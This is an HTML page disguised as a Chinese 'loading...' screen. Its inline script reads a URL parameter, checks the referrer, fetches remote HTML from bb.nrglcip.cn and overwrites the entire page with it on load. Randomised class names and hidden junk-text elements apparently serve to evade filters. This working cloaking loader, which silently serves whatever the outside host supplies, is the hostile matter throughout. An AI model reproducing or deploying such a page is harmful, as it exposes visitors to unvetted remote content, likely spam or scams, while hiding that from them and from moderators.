<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MNAtQ3fE3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MNAtQ3fE3 .quKWjiv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MNAtQ3fE3 .content {
            line-height: 50px;
            text-align: center
        }

        .MNAtQ3fE3 .img {
            width: 100%
        }

        .MNAtQ3fE3 .VACakwrUrw {
            text-align: center
        }

        .MNAtQ3fE3 .VACakwrUrw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MNAtQ3fE3 .VACakwrUrw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MNAtQ3fE3 .VACakwrUrw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MNAtQ3fE3 .VACakwrUrw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MNAtQ3fE3 .VACakwrUrw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MNAtQ3fE3 .VACakwrUrw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MNAtQ3fE3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fzl2MoUkPLQA8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YWSDFD = fzl2MoUkPLQA8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YWSDFD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YWSDFD +".html?a=share";
		}
		
        L23XLDZ=url+"#"+new Date().getTime();
        L23XLDZ && function() {
            $.get(L23XLDZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >alDn9cn76u3hiuDRCaFSaKyoCrC85m0zTcf4hRlejbUleZGINHOzrde09rrF2BLqcVwY</b>
<div style='display:none'>sfy9Gp9MTrxPSyyRjvSYaZ9o</div>
<span style='display:none'>fQJWkqrunkxOCU489ozZJ2ixfJtafAFkPcgTfXlKuAJx8tyC3CxtgEpje9GaS8uwMHNr3YFx</span>
<ul style='display:none' >Btllb8pGoQzL0fcxhWA1pKRoZsHAl2L6qw4ZRuj8pINhODEkG0pUjGvp9uf0zwfmFi</ul>
<img  src='' style='display:none'>
<span style='display:none'>fQJWkqrunkxOCU489ozZJ2ixfJtafAFkPcgTfXlKuAJx8tyC3CxtgEpje9GaS8uwMHNr3YFx</span><div class="MNAtQ3fE3">
    <div class="quKWjiv">
        <div class="VACakwrUrw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >gJMirhZqytjunx1GhEylPvJOo</b>
<p  style='display:none'>I1EZU1j8ju14dVJlrMzcv1phQXWwetE0VbbHRVOYNqRUIweZtyC7FwuHiJWEztGNd4QgxogJWT</p>
<h1 style='display:none' >sMeaUwc9xNwn4Gx4QIm</h1>
<span style='display:none'>ic59FdSkK8W4HlpH10iMaYb3YD9CD4uwbRFtnFD4aAF4rp4RPF7CS</span>
<span style='display:none'>ic59FdSkK8W4HlpH10iMaYb3YD9CD4uwbRFtnFD4aAF4rp4RPF7CS</span></body>
</html>